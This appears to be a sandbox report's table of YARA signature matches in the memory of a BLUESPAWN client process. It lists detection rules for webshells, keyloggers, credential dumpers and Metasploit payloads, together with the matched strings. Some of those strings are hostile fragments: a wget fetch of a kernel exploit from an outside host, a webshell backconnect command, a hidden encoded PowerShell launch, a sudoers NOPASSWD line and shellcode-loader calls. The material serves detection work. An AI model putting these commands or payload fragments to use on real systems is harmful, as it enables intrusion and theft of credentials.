- 0x55554:$s3: displaysecinfo("Where is perl?",myshellexec("whereis perl"));
- 0x55596:$s4: $ret = myshellexec($handler);
- 0x555b8:$s5: if (posix_kill($pid,$sig)) {echo "OK.";}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_r57shell_2 | Detects Webshell R57 | Florian Roth | - 0x55a57:$s1: $connection = @ftp_connect($ftp_server,$ftp_port,10);
- 0x55a91:$s2: echo $lang[$language.'_text98'].$suc."\r\n";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x55e19:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
- 0x55e77:$s1: $_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 | Detects Webshell - rule generated from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ... | Florian Roth | - 0x56334:$s1: $_POST['cmd'] = which('
- 0x55e19:$s2: $blah = ex(
- 0x56350:$s2: $blah = ex(
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_c100 | Detects Webshell - rule generated from files c100 v. 777shell | Florian Roth | - 0x5664c:$s0: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
- 0x566c2:$s1: <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
- 0x2b0b5:$s3: cut -d: -f1,2,3 /etc/passwd | grep ::
- 0x5671f:$s3: cut -d: -f1,2,3 /etc/passwd | grep ::
- 0x56749:$s4: which wget curl w3m lynx
- 0x56766:$s6: netstat -atup | grep IST
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_AcidPoison | Detects Poison Sh3ll - Webshell | Florian Roth | - 0x56b28:$s1: elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 | Detects Webshell - rule generated from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt | Florian Roth | - 0x56dd0:$s0: <form method="POST"><input type=hidden name=act value="ls">
- 0x56e10:$s2: foreach($quicklaunch2 as $item) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_exploit_cve_5889 | http://www.cvedetails.com/cve/cve-2015-5889 | @mimeframe | - 0x3290ae:$a1: /etc/sudoers
- 0x3290c7:$a2: /etc/crontab
- 0x3290e0:$a3: * * * * * root echo
- 0x375b38:$a3: * * * * * root echo
- 0x329100:$a4: ALL ALL=(ALL) NOPASSWD: ALL
- 0x375b4e:$a4: ALL ALL=(ALL) NOPASSWD: ALL
- 0x329128:$a5: /usr/bin/rsh
- 0x81aec:$a6: localhost
- 0x820f5:$a6: localhost
- 0x103d9f:$a6: localhost
- 0x1043a8:$a6: localhost
- 0x110f5e:$a6: localhost
- 0x11287b:$a6: localhost
- 0x157cb2:$a6: localhost
- 0x158a0b:$a6: localhost
- 0x169be6:$a6: localhost
- 0x16a502:$a6: localhost
- 0x2cf7c0:$a6: localhost
- 0x2e20ff:$a6: localhost
- 0x329141:$a6: localhost
- 0x336d74:$a6: localhost
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_exploit_tpwn | tpwn exploits a null pointer dereference in XNU to escalate privileges to root. | @mimeframe | - 0x329278:$a1: [-] Couldn't find a ROP gadget, aborting.
- 0x375c4d:$a1: [-] Couldn't find a ROP gadget, aborting.
- 0x3292ae:$a2: leaked kaslr slide,
- 0x375c79:$a2: leaked kaslr slide,
- 0x3292ce:$a3: didn't get root, but this system is vulnerable.
- 0x375c8f:$a3: didn't get root, but this system is vulnerable.
- 0x32930a:$a4: Escalating privileges! -qwertyoruiop
- 0x375cc1:$a4: Escalating privileges! -qwertyoruiop
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_juuso_keychaindump | For reading OS X keychain passwords as root. | @mimeframe | - 0x32942c:$a1: [-] Too many candidate keys to fit in memory
- 0x375d7e:$a1: [-] Too many candidate keys to fit in memory
- 0x329465:$a2: [-] Could not allocate memory for key search
- 0x375dad:$a2: [-] Could not allocate memory for key search
- 0x32949e:$a3: [-] Too many credentials to fit in memory
- 0x375ddc:$a3: [-] Too many credentials to fit in memory
- 0x3294d4:$a4: [-] The target file is not a keychain file
- 0x375e08:$a4: [-] The target file is not a keychain file
- 0x32950b:$a5: [-] Could not find the securityd process
- 0x375e35:$a5: [-] Could not find the securityd process
- 0x329540:$a6: [-] No root privileges, please run with sudo
- 0x375e60:$a6: [-] No root privileges, please run with sudo
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_b4rsby_swiftlog | Dirty user level command line keylogger hacked together in Swift. | @mimeframe | - 0x329683:$a1: You need to enable the keylogger in the System Prefrences
- 0x375f3e:$a1: You need to enable the keylogger in the System Prefrences
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_caseyscarborough | A simple and easy to use keylogger for macOS. | @mimeframe | - 0x3297cb:$a1: /var/log/keystroke.log
- 0x32997c:$a1: /var/log/keystroke.log
- 0x376021:$a1: /var/log/keystroke.log
- 0x37614f:$a1: /var/log/keystroke.log
- 0x3297ee:$a2: ERROR: Unable to create event tap.
- 0x329cb6:$a2: ERROR: Unable to create event tap.
- 0x37603a:$a2: ERROR: Unable to create event tap.
- 0x37638d:$a2: ERROR: Unable to create event tap.
- 0x32981d:$a3: Keylogging has begun.
- 0x37605f:$a3: Keylogging has begun.
- 0x32983f:$a4: ERROR: Unable to open log file. Ensure that you have the proper permissions.
- 0x376077:$a4: ERROR: Unable to open log file. Ensure that you have the proper permissions.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_dannvix | A simple keylogger for macOS. | @mimeframe | - 0x3297cb:$a1: /var/log/keystroke.log
- 0x32997c:$a1: /var/log/keystroke.log
- 0x376021:$a1: /var/log/keystroke.log
- 0x37614f:$a1: /var/log/keystroke.log
- 0x32999f:$a2: <forward-delete>
- 0x376168:$a2: <forward-delete>
- 0x415da:$a3: <unknown>
- 0x41b0c:$a3: <unknown>
- 0xc388d:$a3: <unknown>
- 0xc3dbf:$a3: <unknown>
- 0x3299bc:$a3: <unknown>
- 0x37617b:$a3: <unknown>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_eldeveloper_keystats | A simple keylogger for macOS. | @mimeframe | - 0x329ac2:$a1: YVBKeyLoggerPerishedNotification
- 0x37621c:$a1: YVBKeyLoggerPerishedNotification
- 0x329aef:$a2: YVBKeyLoggerPerishedByLackOfResponseNotification
- 0x37623f:$a2: YVBKeyLoggerPerishedByLackOfResponseNotification
- 0x329b2c:$a3: YVBKeyLoggerPerishedByUserChangeNotification
- 0x376272:$a3: YVBKeyLoggerPerishedByUserChangeNotification
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_giacomolaw | A simple keylogger for macOS. | @mimeframe | - 0x329c4b:$a1: ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions.
- 0x37632c:$a1: ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions.
- 0x3297ee:$a2: ERROR: Unable to create event tap.
- 0x329cb6:$a2: ERROR: Unable to create event tap.
- 0x37603a:$a2: ERROR: Unable to create event tap.
- 0x37638d:$a2: ERROR: Unable to create event tap.
- 0x329ce5:$a3: Keystrokes are now being recorded
- 0x3763b2:$a3: Keystrokes are now being recorded
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_logkext | LogKext is an open source keylogger for Mac OS X, a product of FSB software. | @mimeframe | - 0x329e22:$a1: logKextPassKey
- 0x329f2b:$a1: logKextPassKey
- 0x37648a:$a1: logKextPassKey
- 0x376557:$a1: logKextPassKey
- 0x329e3d:$a2: Couldn't get system keychain:
- 0x37649b:$a2: Couldn't get system keychain:
- 0x329e67:$a3: Error finding secret in keychain
- 0x3764bb:$a3: Error finding secret in keychain
- 0x329e94:$a4: com_fsb_iokit_logKext
- 0x3764de:$a4: com_fsb_iokit_logKext
- 0x329eb6:$b1: logKext Password:
- 0x3764f6:$b1: logKext Password:
- 0x329ed4:$b2: Logging controls whether the daemon is logging keystrokes (default is on).
- 0x37650a:$b2: Logging controls whether the daemon is logging keystrokes (default is on).
- 0x329e22:$c1: logKextPassKey
- 0x329f2b:$c1: logKextPassKey
- 0x37648a:$c1: logKextPassKey
- 0x376557:$c1: logKextPassKey
- 0x329f46:$c2: Error: couldn't create secAccess
- 0x376568:$c2: Error: couldn't create secAccess
- 0x329f73:$d1: IOHIKeyboard
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_roxlu_ofxkeylogger | ofxKeylogger keylogger. | @mimeframe | - 0x32a0cf:$a1: keylogger_init
- 0x37666e:$a1: keylogger_init
- 0x32a0ea:$a2: install_keylogger_hook function not found in dll.
- 0x37667f:$a2: install_keylogger_hook function not found in dll.
- 0x32a128:$a3: keylogger_set_callback
- 0x3766b3:$a3: keylogger_set_callback
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_keylogger_skreweverything_swift | It is a simple and easy to use keylogger for macOS written in Swift. | @mimeframe | - 0x32a26e:$a1: Can't create directories!
- 0x376794:$a1: Can't create directories!
- 0x32a294:$a2: Can't create manager
- 0x3767b0:$a2: Can't create manager
- 0x32a2b5:$a3: Can't open HID!
- 0x3767c7:$a3: Can't open HID!
- 0x32a2d1:$a4: PRINTSCREEN
- 0x3767d9:$a4: PRINTSCREEN
- 0x32a2e9:$a5: LEFTARROW
- 0x3767e7:$a5: LEFTARROW
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_macpmem | MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers. | @mimeframe | - 0x32a43a:$a1: %s/MacPmem.kext
- 0x3768d3:$a1: %s/MacPmem.kext
- 0x32a456:$a2: The Pmem physical memory imager.
- 0x3768e5:$a2: The Pmem physical memory imager.
- 0x32a483:$a3: The OSXPmem memory imager.
- 0x376908:$a3: The OSXPmem memory imager.
- 0x32a4aa:$a4: These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs.
- 0x376925:$a4: These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs.
- 0x32a513:$a5: Pmem driver version incompatible. Reported
- 0x376984:$a5: Pmem driver version incompatible. Reported
- 0x32a54a:$a6: Memory access driver left loaded since you specified the -l flag.
- 0x3769b1:$a6: Memory access driver left loaded since you specified the -l flag.
- 0x32a598:$b1: Unloading MacPmem
- 0x3769f5:$b1: Unloading MacPmem
- 0x32a5b6:$b2: MacPmem load tag is
- 0x376a09:$b2: MacPmem load tag is
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_manwhoami_icloudcontacts | Pulls iCloud Contacts for an account. No dependencies. No user notification. | @mimeframe | - 0x32a6f3:$a1: https://setup.icloud.com/setup/authenticate/
- 0x376ae1:$a1: https://setup.icloud.com/setup/authenticate/
- 0x32a72c:$a2: https://p04-contacts.icloud.com/
- 0x376b10:$a2: https://p04-contacts.icloud.com/
- 0x32a759:$a3: HTTP Error 401: Unauthorized. Are you sure the credentials are correct?
- 0x376b33:$a3: HTTP Error 401: Unauthorized. Are you sure the credentials are correct?
- 0x32a7ad:$a4: HTTP Error 404: URL not found. Did you enter a username?
- 0x376b7d:$a4: HTTP Error 404: URL not found. Did you enter a username?
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_manwhoami_mmetokendecrypt | This program decrypts / extracts all authorization tokens on macOS / OS X / OSX. | @mimeframe | - 0x32a915:$a1: security find-generic-password -ws 'iCloud'
- 0x376c80:$a1: security find-generic-password -ws 'iCloud'
- 0x32a94d:$a2: ERROR getting iCloud Decryption Key
- 0x376cae:$a2: ERROR getting iCloud Decryption Key
- 0x32a97d:$a3: Could not find MMeTokenFile. You can specify the file manually.
- 0x376cd4:$a3: Could not find MMeTokenFile. You can specify the file manually.
- 0x32a9c9:$a4: Decrypting token plist ->
- 0x376d16:$a4: Decrypting token plist ->
- 0x32a9ef:$a5: Successfully decrypted token plist!
- 0x376d32:$a5: Successfully decrypted token plist!
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_manwhoami_osxchromedecrypt | Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X. | @mimeframe | - 0x32ab40:$a1: Credit Cards for Chrome Profile
- 0x376e1e:$a1: Credit Cards for Chrome Profile
- 0x32ab6c:$a2: Passwords for Chrome Profile
- 0x376e40:$a2: Passwords for Chrome Profile
- 0x32ab95:$a3: Unknown Card Issuer
- 0x376e5f:$a3: Unknown Card Issuer
- 0x32abb5:$a4: ERROR getting Chrome Safe Storage Key
- 0x376e75:$a4: ERROR getting Chrome Safe Storage Key
- 0x32abe7:$b1: select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards
- 0x376e9d:$b1: select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards
- 0x32ac53:$b2: select username_value, password_value, origin_url, submit_element from logins
- 0x376eff:$b2: select username_value, password_value, origin_url, submit_element from logins
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_n0fate_chainbreaker | chainbreaker can extract user credentials from a Keychain file with the Master Key or user password in a forensically sound manner. | @mimeframe | - 0x32adee:$a1: [!] Private Key Table is not available
- 0x377035:$a1: [!] Private Key Table is not available
- 0x32ae21:$a2: [!] Public Key Table is not available
- 0x37705e:$a2: [!] Public Key Table is not available
- 0x32ae53:$a3: [-] Decrypted Private Key
- 0x377086:$a3: [-] Decrypted Private Key
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_macos_ptoomey3_keychain_dumper | Keychain dumping utility. | @mimeframe | - 0x32ae91:$a1: keychain_dumper
- 0x32af63:$a1: keychain_dumper
- 0x3770b7:$a1: keychain_dumper
- 0x377131:$a1: keychain_dumper
- 0x32af7f:$a2: /var/Keychains/keychain-2.db
- 0x377143:$a2: /var/Keychains/keychain-2.db
- 0x32afa8:$a3: <key>keychain-access-groups</key>
- 0x377162:$a3: <key>keychain-access-groups</key>
- 0x32afd6:$a4: SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet
- 0x377186:$a4: SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet
- 0x32b026:$a5: dumpEntitlements
- 0x3771cc:$a5: dumpEntitlements
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_bloodhound_owned | Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains | @fusionrace | - 0x32b194:$s1: Find all owned Domain Admins
- 0x32b1bd:$s2: Find Shortest Path from owned node to Domain Admins
- 0x32b1fd:$s3: List all directly owned nodes
- 0x32b227:$s4: Set owned and wave properties for a node
- 0x32b25c:$s5: Find spread of compromise for owned nodes in wave
- 0x32b29a:$s6: Show clusters of password reuse
- 0x32b2c6:$s7: Something went wrong when creating SharesPasswordWith relationship
- 0x32b315:$s8: reference doc of custom Cypher queries for BloodHound
- 0x32b357:$s9: Created SharesPasswordWith relationship between
- 0x32b393:$s10: Skipping finding spread of compromise due to
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_jtesta_ssh_mitm | intercepts ssh connections to capture credentials | @fusionrace | - 0x32b4bd:$a1: INTERCEPTED PASSWORD:
- 0x377540:$a1: INTERCEPTED PASSWORD:
- 0x32b4df:$a2: more sshbuf problems.
- 0x377558:$a2: more sshbuf problems.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_masscan | masscan is a performant port scanner; it produces results similar to nmap | @mimeframe | - 0x32b60b:$a1: EHLO masscan
- 0x32b624:$a2: User-Agent: masscan/
- 0x37762e:$a2: User-Agent: masscan/
- 0x32b645:$a3: /etc/masscan/masscan.conf
- 0x32b66b:$b1: nmap(%s): unsupported. This code will never do DNS lookups.
- 0x377661:$b1: nmap(%s): unsupported. This code will never do DNS lookups.
- 0x32b6b3:$b2: nmap(%s): unsupported, we do timing WAY different than nmap
- 0x37769f:$b2: nmap(%s): unsupported, we do timing WAY different than nmap
- 0x32b6fb:$b3: [hint] I've got some local priv escalation 0days that might work
- 0x3776dd:$b3: [hint] I've got some local priv escalation 0days that might work
- 0x32b748:$b4: [hint] VMware on Macintosh doesn't support masscan
- 0x377720:$b4: [hint] VMware on Macintosh doesn't support masscan
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_ncc_ABPTTS | Allows for TCP tunneling over HTTP | @mimeframe | - 0x32b863:$s1: ---===[[[ A Black Path Toward The Sun ]]]===---
- 0x3777d6:$s1: ---===[[[ A Black Path Toward The Sun ]]]===---
- 0x32b89f:$s2: https://vulnerableserver/EStatus/
- 0x377808:$s2: https://vulnerableserver/EStatus/
- 0x32b8cd:$s3: Error: no ABPTTS forwarding URL was specified. This utility will now exit.
- 0x37782c:$s3: Error: no ABPTTS forwarding URL was specified. This utility will now exit.
- 0x32b924:$s4: tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq
- 0x32b955:$s5: 63688c4f211155c76f2948ba21ebaf83
- 0x32b982:$s6: ABPTTSClient-log.txt
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_ntlmrelayx | https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/ | @mimeframe | - 0x32bacb:$a1: Started interactive SMB client shell via TCP
- 0x3779a7:$a1: Started interactive SMB client shell via TCP
- 0x32bb04:$a2: Service Installed.. CONNECT!
- 0x3779d6:$a2: Service Installed.. CONNECT!
- 0x32bb2d:$a3: Done dumping SAM hashes for host:
- 0x3779f5:$a3: Done dumping SAM hashes for host:
- 0x32bb5b:$a4: DA already added. Refusing to add another
- 0x377a19:$a4: DA already added. Refusing to add another
- 0x32bb91:$a5: Domain info dumped into lootdir!
- 0x377a45:$a5: Domain info dumped into lootdir!
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_pyrasite_py | A tool for injecting arbitrary code into running Python processes. | @fusionrace | - 0x32bcbd:$s1: WARNING: ptrace is disabled. Injection will not work.
- 0x32bcff:$s2: A payload that connects to a given host:port and receives commands
- 0x32bd4e:$s3: A reverse Python connection payload.
- 0x32bd7f:$s4: pyrasite - inject code into a running python process
- 0x32bdc0:$s5: The ID of the process to inject code into
- 0x32bdf6:$s6: This file is part of pyrasite.
- 0x32bc62:$s7: https://github.com/lmacken/pyrasite
- 0x32be21:$s7: https://github.com/lmacken/pyrasite
- 0x32be51:$s8: Setup a communication socket with the process by injecting
- 0x32be98:$s9: a reverse subshell and having it connect back to us.
- 0x32bed9:$s10: Write out a reverse python connection payload with a custom port
- 0x32bf26:$s11: Wait for the injected payload to connect back to us
- 0x32bf66:$s12: PyrasiteIPC
- 0x32bf7e:$s13: A reverse Python shell that behaves like Python interactive interpreter.
- 0x32bfd3:$s14: pyrasite cannot establish reverse
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_multi_responder_py | Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server | @fusionrace | - 0x32c161:$s1: Poison all requests with another IP address than Responder's one.
- 0x32c1af:$s2: Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
- 0x32c20b:$s3: Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network.
- 0x32c285:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x32c387:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x32c2e4:$s5: Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)
- 0x32c34b:$s6: 31mOSX detected, -i mandatory option is missing
- 0x32c285:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x32c387:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_hot_potato | https://foxglovesecurity.com/2016/01/16/hot-potato/ | @mimeframe | - 0x32c4d8:$a1: Parsing initial NTLM auth...
- 0x3781a4:$a1: Parsing initial NTLM auth...
- 0x32c501:$a2: Got PROPFIND for /test...
- 0x3781c3:$a2: Got PROPFIND for /test...
- 0x32c527:$a3: Starting NBNS spoofer...
- 0x3781df:$a3: Starting NBNS spoofer...
- 0x32c54c:$a4: Exhausting UDP source ports so DNS lookups will fail...
- 0x3781fa:$a4: Exhausting UDP source ports so DNS lookups will fail...
- 0x32c590:$a5: Usage: potato.exe -ip
- 0x378234:$a5: Usage: potato.exe -ip
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_moyix_creddump | creddump is a python tool to extract credentials and secrets from Windows registry hives. | @mimeframe | - 0x32c6ca:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
- 0x378309:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
- 0x32c705:$a2: 0123456789012345678901234567890123456789
- 0x37833a:$a2: 0123456789012345678901234567890123456789
- 0x32c73a:$a3: NTPASSWORD
- 0x378365:$a3: NTPASSWORD
- 0x32c751:$a4: LMPASSWORD
- 0x378372:$a4: LMPASSWORD
- 0x2d4363:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x32c768:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x339ec3:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x37837f:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x32c795:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
- 0x3783a2:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_ncc_wmicmd | Command shell wrapper for WMI | @mimeframe | - 0x32c89b:$a1: Need to specify a username, domain and password for non local connections
- 0x37844b:$a1: Need to specify a username, domain and password for non local connections
- 0x32c8f1:$a2: WS-Management is running on the remote host
- 0x378497:$a2: WS-Management is running on the remote host
- 0x32c929:$a3: firewall (if enabled) allows connections
- 0x3784c5:$a3: firewall (if enabled) allows connections
- 0x32c95e:$a4: WARNING: Didn't see stdout output finished marker - output may be truncated
- 0x3784f0:$a4: WARNING: Didn't see stdout output finished marker - output may be truncated
- 0x32c9b6:$a5: Command sleep in milliseconds - increase if getting truncated output
- 0x37853e:$a5: Command sleep in milliseconds - increase if getting truncated output
- 0x32ca07:$b1: 0x800706BA
- 0x378585:$b1: 0x800706BA
- 0x32ca1e:$b2: NTLMDOMAIN:
- 0x378592:$b2: NTLMDOMAIN:
- 0x32ca36:$b3: cimv2
- 0x3785a0:$b3: cimv2
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_rdp_cmd_delivery | Delivers a text payload via RDP (rubber ducky) | @fusionrace | - 0x32cb5a:$s1: Usage: rdp-cmd-delivery.sh OPTIONS
- 0x37865f:$s1: Usage: rdp-cmd-delivery.sh OPTIONS
- 0x32cb89:$s2: [--tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt
- 0x378684:$s2: [--tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt
- 0x32cbe7:$s3: -cmdfile local.bat #will execute everything from local.bat
- 0x3786d8:$s3: -cmdfile local.bat #will execute everything from local.bat
- 0x32cc3d:$s4: To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console
- 0x378724:$s4: To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_wmi_implant | A PowerShell based tool that is designed to act like a RAT | @fusionrace | - 0x32cdc3:$s1: This really isn't applicable unless you are using WMImplant interactively.
- 0x32ce1a:$s2: What command do you want to run on the remote system? >
- 0x32ce5e:$s3: Do you want to [create] or [delete] a string registry value? >
- 0x32cea9:$s4: Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >
- 0x32cf0d:$s5: What is the name of the service you are targeting? >
- 0x32cf4e:$s6: This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine
- 0x32cfd0:$s7: gen_cli - Generate the CLI command to execute a command via WMImplant
- 0x32d022:$s8: exit - Exit WMImplant
- 0x32d044:$s9: Lateral Movement Facilitation
- 0x32d06e:$s10: vacant_system - Determine if a user is away from the system.
- 0x32d0b7:$s11: Please provide the ProcessID or ProcessName flag to specify the process to kill!
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_mimikatz_errors | Mimikatz credential dump tool: Error messages | @fusionrace | - 0x32d70f:$s1: [ERROR] [LSA] Symbols
- 0x32d731:$s2: [ERROR] [CRYPTO] Acquire keys
- 0x32d75b:$s3: [ERROR] [CRYPTO] Symbols
- 0x32d780:$s4: [ERROR] [CRYPTO] Init
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hacktool_windows_mimikatz_sekurlsa | Mimikatz credential dump tool | @fusionrace | - 0x32de5a:$s1: dpapisrv!g_MasterKeyCacheList
- 0x32de84:$s2: lsasrv!g_MasterKeyCacheList
- 0x32deac:$s3: !SspCredentialList
- 0x379470:$s3: !SspCredentialList
- 0x32decb:$s4: livessp!LiveGlobalLogonSessionList
- 0x32defa:$s5: wdigest!l_LogSessList
- 0x32df1c:$s6: tspkg!TSGlobalCredTable
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | - 0x2bee22:$s1: export buf=\
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0x2befc6:$s1: & "\" & "svchost.exe"
- 0x2befe8:$s2: CreateObject("Wscript.Shell")
- 0x2c019f:$s2: CreateObject("Wscript.Shell")
- 0x2c2b6c:$s2: CreateObject("Wscript.Shell")
- 0x2c3780:$s2: CreateObject("Wscript.Shell")
- 0x2caf64:$s2: CreateObject("Wscript.Shell")
- 0x32e1c2:$s2: CreateObject("Wscript.Shell")
- 0x2bf012:$s3: <% @language="VBScript" %>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0x2bf1ca:$s1: powershell.exe -nop -w hidden -e
- 0x2c0989:$s1: powershell.exe -nop -w hidden -e
- 0x2c2065:$s1: powershell.exe -nop -w hidden -e
- 0x2c30e4:$s1: powershell.exe -nop -w hidden -e
- 0x2caed9:$s1: powershell.exe -nop -w hidden -e
- 0x3337e5:$s1: powershell.exe -nop -w hidden -e
- 0x2bf1f7:$s2: Call Shell(
- 0x2bf20f:$s3: Sub Workbook_Open()
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0x2bf3c0:$s1: '* PAYLOAD DATA
- 0x2bf3dc:$s2: = Shell(
- 0x2c21b7:$s2: = Shell(
- 0x2bf3f2:$s3: = Environ("USERPROFILE")
- 0x2bf417:$s4: '**************************************************************
- 0x2bf463:$s5: ChDir (
- 0x2bf477:$s6: '* MACRO CODE
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0x2bf61c:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x2c232d:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x2bf672:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0x2bf6b7:$s3: .func]::VirtualAlloc(0,
- 0x2c23b4:$s3: .func]::VirtualAlloc(0,
- 0x2bf6db:$s4: .func+AllocationType]::Reserve -bOr [
- 0x2c23ce:$s4: .func+AllocationType]::Reserve -bOr [
- 0x2bf70d:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0x2bf74f:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0x2bf7a8:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0x2bf7f5:$s8: .func]::CreateThread(0,0,$
- 0x2bf81c:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0x2bf85a:$s10: = [System.Convert]::FromBase64String("/
- 0x2c2512:$s10: = [System.Convert]::FromBase64String("/
- 0x2bf88e:$s11: { $global:result = 3; return }
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0x2bfa45:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x2c2652:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x2bfa76:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
